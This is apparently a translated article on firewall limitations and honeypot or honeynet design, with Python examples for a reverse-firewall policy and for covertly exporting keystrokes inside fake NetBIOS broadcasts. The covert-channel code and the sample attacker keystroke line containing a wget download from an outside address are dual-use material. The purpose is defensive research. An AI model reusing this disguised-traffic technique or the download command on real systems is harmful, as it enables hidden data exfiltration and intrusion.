Honeypot Technology: Research on Overcoming Firewall Limitations and Vulnerabilities

Source: Internet
Author: User
Tags: system log
The firewall is the most widely deployed security device on networks and an important cornerstone of network security. In competing for market share, firewall vendors have made ever larger claims, and a number of misconceptions have taken hold in the market. A typical one is to treat the firewall as a universal solution. Yet a computer security survey published in August 2002 reported that more than 47% of firewalls had been breached. Studying the limitations and vulnerabilities of firewalls is therefore necessary for using a network safely.
Ten limitations of firewalls
1. A firewall cannot prevent attacks that do not pass through it. Traffic that does not traverse the firewall cannot be inspected by it.

2. A firewall cannot resolve attacks and security problems that originate on the internal network. A firewall can be designed to guard against untrusted internal hosts as well as external ones, but the vast majority of organizations find this inconvenient and do not require the firewall to police the inside.

3. A firewall cannot prevent security threats caused by an improperly configured policy. A firewall is a passive policy enforcement device: like a doorman, it enforces the rules it is given and takes no initiative of its own.

4. A firewall cannot prevent man-made or natural damage by anyone with physical access to it. A firewall is a security device, but it must itself be kept in a secure place.

5. A firewall cannot prevent attacks that exploit defects in standard network protocols. Once a firewall permits a given standard protocol, it cannot stop attacks that abuse flaws in that protocol.

6. A firewall cannot prevent attacks that exploit vulnerabilities in server software. The attacker reaches the vulnerable server through a port the firewall permits, and the firewall has no way to stop this.

7. A firewall cannot prevent the transmission of infected files. The firewall itself cannot remove viruses, and even with integrated third-party anti-virus software, no product can catch every virus.

8. A firewall cannot prevent data-driven attacks, in which seemingly harmless data is mailed or copied to an intranet host and then executed there.

9. A firewall cannot prevent leaks from inside. When a legitimate user inside the firewall deliberately leaks information, the firewall is powerless.

10. A firewall cannot prevent threats arising from its own security vulnerabilities. A firewall protects others but sometimes cannot protect itself; there is no guarantee that it has no security vulnerabilities of its own. A firewall must therefore be protected in turn.

Ten vulnerabilities of firewalls

1. A firewall's operating system cannot be guaranteed free of holes. No firewall vendor claims its product runs without an operating system, and no operating system can be guaranteed free of security flaws.

2. Firewall hardware cannot be guaranteed never to fail. All hardware has a life cycle and ages; one day it will fail.

3. Firewall software cannot be guaranteed free of holes. Firewall software is still software, and software has bugs.

4. A firewall cannot fix vulnerabilities in TCP/IP and the other protocols it is built on. Because the firewall itself is implemented on top of TCP/IP, it cannot resolve vulnerabilities in how TCP/IP operates.

5. A firewall cannot tell a malicious command from a benign one. Many commands are legitimate in an administrator's hands and dangerous in an attacker's.

6. A firewall cannot tell malicious traffic from benign traffic. A ping used for network diagnostics and a ping used for an attack produce the same traffic.

7. The security of a firewall is inversely proportional to its number of features. Piling on functions contradicts the firewall's security principle, so functionality should be kept to a minimum unless a feature is definitely needed.

8. The security of a firewall is inversely proportional to its speed. Firewall security rests on inspecting data: the finer the inspection, the safer, but also the slower.

9. The number of features of a firewall is inversely proportional to its speed. More features mean more CPU and memory consumption and more checks, and therefore lower throughput.

10. A firewall cannot guarantee the security of the services it permits. Allowing a service says nothing about that service's security; security problems in permitted services must be solved at the application layer.

The market needs a new generation of firewalls

With computer networks becoming ever more widespread, the market needs a new generation of firewalls to change the present insecure situation.

A new generation of firewalls should be positioned to address the following problems: 1. the security of protocols; 2. attacks carried by viruses; 3. trust and credibility; 4. the security of the firewall itself.

Developments in network security technology such as physical-isolation network gaps (GAP), anti-disclosure (leak prevention) systems, anti-virus gateways, anti-attack (anti-DDoS) gateways and intrusion detection and prevention (IDP) have gone a long way towards making up for the shortcomings of firewall technology, together forming a more secure network defense system.

Tired of keeping hackers out? Then it is time to go on the offensive. At least that is the idea behind the so-called honeypot: a computer system designed to attract attackers and then record their every move.


Implementing honeypot technology

A honeypot is like an intelligence-gathering system. It is deliberately set up as a target, luring hackers to attack it, so that when an intruder breaks in you can see how he succeeded and keep abreast of the latest attacks and the vulnerabilities in your own servers. You can also trace the links between hackers, collect the tools they use, and map their social networks.

Setting up a honeypot is not difficult: all it takes is a computer on the public Internet running an unpatched Microsoft Windows or Red Hat Linux. Because hackers may disable the computer's logging and auditing capabilities, you need to place a network monitoring system between the computer and the Internet that silently records all traffic to and from it. Then you just sit back and wait for attackers to walk into the trap.

Setting up a honeypot is not risk-free, however, because most compromised systems are used by hackers to attack other systems. This is the problem of downstream liability, and it leads to the topic of the honeynet.

A honeynet is a way of deploying honeypot technology that records a hacker's actions in a sensible way while minimizing or eliminating the risk to other systems on the Internet. A honeypot built behind a reverse firewall is one example: the purpose of this firewall is not to block inbound connections but to prevent the honeypot from establishing outbound ones. Although this approach keeps the honeypot from disrupting other systems, it is easily discovered by hackers.
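As an added illustration (not code from the article or from the Honeynet Project), here is the reverse-firewall policy above expressed as a small Python decision engine for the monitor that sits between the honeypot and the Internet. Inbound connections are always accepted, outbound connections from the honeypot are dropped, and every outbound attempt raises an alert, since a honeypot initiating a connection is the clearest sign that it has been compromised. Because a hard block is exactly what gives the honeypot away, the engine also supports an assumed variant that lets a small number of outbound connections through per hour. The honeypot address and the connection records are constructed for the example.

```python
"""Honeynet data control: the honeypot accepts any inbound connection but is
prevented (or tightly limited) from opening outbound connections, so that a
compromised honeypot cannot be turned against third parties."""
from dataclasses import dataclass, field

HONEYPOT = "10.0.0.5"   # assumed honeypot address, illustrative only


@dataclass(frozen=True)
class Conn:
    """One connection attempt seen by the monitor between honeypot and Internet."""
    ts: int       # seconds since epoch
    src: str
    dst: str
    dport: int
    proto: str = "tcp"


@dataclass
class DataControl:
    honeypot: str
    outbound_limit: int = 0   # 0 = strict reverse firewall; N = allow N outbound per window
    window: int = 3600        # seconds
    allowed_out: list = field(default_factory=list)   # timestamps of outbound connections let through
    alerts: list = field(default_factory=list)

    def decide(self, c: Conn) -> str:
        if c.dst == self.honeypot:
            # Inbound: never block, attracting attackers is the whole point.
            return "ACCEPT"
        if c.src == self.honeypot:
            # Outbound from the honeypot means the attacker is in and trying to
            # use it: every attempt is worth an alert whether or not it passes.
            self.alerts.append(f"{c.ts} honeypot -> {c.dst}:{c.dport}/{c.proto}")
            # Forget allowed connections that fell out of the sliding window.
            self.allowed_out = [t for t in self.allowed_out if c.ts - t < self.window]
            if len(self.allowed_out) < self.outbound_limit:
                self.allowed_out.append(c.ts)
                return "ACCEPT"
            return "DROP"
        # Neither side is the honeypot: the bridge should never carry this.
        return "DROP"


def apply_policy(policy: DataControl, conns) -> list:
    """Run every connection through the policy and return the decisions in order."""
    return [policy.decide(c) for c in conns]


# Constructed sample: an attacker brute-forces SSH, gets in, then the honeypot
# tries to reach an IRC server and scan a third party.
SAMPLE = [
    Conn(1000, "203.0.113.7", HONEYPOT, 22),
    Conn(1005, "203.0.113.7", HONEYPOT, 22),
    Conn(1300, HONEYPOT, "198.51.100.9", 6667),
    Conn(1301, HONEYPOT, "198.51.100.9", 6667),
    Conn(1302, HONEYPOT, "192.0.2.44", 445),
    Conn(5000, HONEYPOT, "192.0.2.45", 445),   # next hour: the window has slid
]

if __name__ == "__main__":
    strict = DataControl(HONEYPOT)
    print(apply_policy(strict, SAMPLE))        # all outbound dropped
    limited = DataControl(HONEYPOT, outbound_limit=2)
    print(apply_policy(limited, SAMPLE))       # two per hour let through
    print(*limited.alerts, sep="\n")
```

In a real deployment these decisions are realized as rules on a transparent bridge, so the honeypot sees no extra hop; the code is the policy those rules encode. Even the limited mode only caps the number of outbound connections, not what they carry, so every alert has to be followed up at once.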

Data collection is another technical challenge in setting up a honeypot. As long as the honeypot's monitors record every packet in and out of the system, they give a clear picture of what the hacker is doing. The honeypot's own log files are a good source of data too, but an attacker can easily delete them, so the usual approach is to have the honeypot send a copy of its logs to a remote syslog server on the same network that is better defended. (Be sure to monitor the log server as well: if an attacker breaks into that server with a new trick, the honeypot will certainly have proved its worth.)

In recent years, with black-hat groups making increasing use of encryption, data collection has become harder. Hackers have taken the advice of many computer security professionals and switched to SSH and other cryptographic protocols, so that network monitoring reveals nothing about their communications. The Honeynet Project's answer to encryption is to modify the target computer's operating system so that all typed characters, transferred files and other information are recorded in the log of a separate monitoring system. Because an attacker might find such a log, the Honeynet Project uses covert techniques, for example hiding the typed characters inside NetBIOS broadcast packets.
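As an added example covering the two points above (shipping captured data to a separately defended collector, and hiding host-side keystroke capture from an intruder who uses SSH), and not the Honeynet Project's own tool or wire format: a Python module that takes keystrokes captured on the honeypot host, packs them into datagrams that look like ordinary NetBIOS Name Service broadcasts to UDP port 137, and reassembles them on the collector. The packet layout follows the NBNS name-query format; using the first byte of the 16-byte name as a length field, the transaction ID as a sequence number, and the sample command line are assumptions of this example.

```python
"""Covert export of keystrokes captured on a honeypot, disguised as NetBIOS
Name Service (NBNS) name-query broadcasts to UDP/137, plus the collector that
recovers them. Illustrative format, not the Honeynet Project's."""
import struct

NBNS_PORT = 137
NBNS_QUERY_FLAGS = 0x0110   # standard query, recursion desired, broadcast
MAX_CHUNK = 14              # 16-byte NetBIOS name minus length byte and suffix


def nb_encode(name16: bytes) -> bytes:
    """NetBIOS first-level encoding: each byte becomes two letters 'A'..'P'."""
    if len(name16) != 16:
        raise ValueError("NetBIOS names are exactly 16 bytes")
    out = bytearray()
    for b in name16:
        out.append((b >> 4) + 0x41)
        out.append((b & 0x0F) + 0x41)
    return bytes(out)


def nb_decode(enc32: bytes) -> bytes:
    """Inverse of nb_encode."""
    if len(enc32) != 32:
        raise ValueError("encoded NetBIOS names are exactly 32 bytes")
    return bytes(((enc32[i] - 0x41) << 4) | (enc32[i + 1] - 0x41)
                 for i in range(0, 32, 2))


def nbns_name_query(txid: int, name16: bytes) -> bytes:
    """A plain 50-byte NBNS name query (header, encoded name, type NB, class IN)."""
    header = struct.pack("!HHHHHH", txid, NBNS_QUERY_FLAGS, 1, 0, 0, 0)
    question = b"\x20" + nb_encode(name16) + b"\x00" + struct.pack("!HH", 0x0020, 0x0001)
    return header + question


def build_query(txid: int, chunk: bytes) -> bytes:
    """Covert variant: the 'name' is [len][chunk padded with spaces][suffix 0x00]."""
    if len(chunk) > MAX_CHUNK:
        raise ValueError("chunk too large")
    name = bytes([len(chunk)]) + chunk.ljust(MAX_CHUNK, b" ") + b"\x00"
    return nbns_name_query(txid, name)


def export_keystrokes(data: bytes, first_txid: int = 1) -> list:
    """Honeypot side: split keystrokes into datagrams; txid is the sequence number."""
    return [build_query(first_txid + i, data[off:off + MAX_CHUNK])
            for i, off in enumerate(range(0, len(data), MAX_CHUNK))]


def parse_query(pkt: bytes):
    """Return (txid, chunk) if pkt is one of ours, None for genuine NBNS traffic."""
    if len(pkt) != 50:
        return None
    txid, flags, qd, _an, _ns, _ar = struct.unpack("!HHHHHH", pkt[:12])
    if flags != NBNS_QUERY_FLAGS or qd != 1 or pkt[12] != 0x20 or pkt[45] != 0:
        return None
    name = nb_decode(pkt[13:45])
    if name[0] > MAX_CHUNK:      # a real name starts with a printable byte (>= 0x20)
        return None
    return txid, name[1:1 + name[0]]


def collect(packets) -> bytes:
    """Collector side: drop genuine NBNS, reorder by txid, reassemble the stream."""
    parsed = sorted(p for p in map(parse_query, packets) if p is not None)
    return b"".join(chunk for _, chunk in parsed)


if __name__ == "__main__":
    typed = b"id; uname -a; wget http://198.51.100.9/x\n"   # constructed sample
    pkts = export_keystrokes(typed)
    print(len(pkts), "datagrams, first one:", pkts[0].hex())
    print(collect(reversed(pkts)))
```

The collector writes the recovered keystrokes to its own log and never back to the honeypot, which is what makes them survive an attacker's clean-up. The disguise is deliberately thin: anyone capturing traffic on the honeypot sees NBNS queries for names that begin with a non-printable byte, and an intrusion detection rule on exactly that pattern will catch it, so the caveat about attackers finding logs applies to covert channels as well.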


Advantages of honeypot technology

One advantage of honeypot systems is that they greatly reduce the amount of data to be analyzed. On a typical web or mail server, attack traffic is drowned out by legitimate traffic, whereas the data reaching a honeypot is mostly attack traffic. It is therefore much easier to browse the data and identify what the attacker actually did.

Since its start in 1999 the Honeynet Project has collected a great deal of information, available at www.honeynet.org. Some of its findings: attack rates doubled over the past year; attackers increasingly use point-and-click tools that exploit vulnerabilities (and such tools are easy to update when new vulnerabilities are found); but despite their bravado, few hackers use genuinely new attack methods.

Honeypots are mainly a research tool, but they have real commercial applications as well. Place a honeypot on an IP address adjacent to your company's web or mail server and you can learn what attacks those servers are facing.

Honeypots and honeynets are not "fire and forget" security devices, of course. According to the Honeynet Project, fully understanding the damage an attacker does in just 30 minutes typically takes 30 to 40 hours of analysis. The system also needs careful maintenance and testing. With a honeypot you are constantly matching wits with hackers. Put it this way: you choose the battlefield, but your opponent chooses the time of the contest, so you must stay vigilant at all times.

One of the most exciting developments in the honeypot field is the virtual honeynet: a virtual computer network running on a single machine using virtualization systems such as VMware or User-mode Linux. Such systems let you run several virtual computers (usually 4 to 10) on one host, greatly reducing the cost, floor space and management effort of a honeynet. In addition, virtual systems usually support "suspend" and "resume", so you can freeze a compromised machine, analyze the attack, and then bring its TCP/IP connections and other services back up.

For the Chief Security Officer (CSO) of a large organization, one of the best reasons to run a honeynet is to find hostile insiders.
Legal problems of honeypot technology
Surprisingly, monitoring a honeypot can carry legal consequences, such as possibly violating wiretapping laws. Although there is no case law yet, most people familiar with the law believe that consent banners are the way out. In other words, give each honeypot a banner stating: "Anyone using this system agrees that their actions may be monitored and disclosed to others, including law enforcement officers."
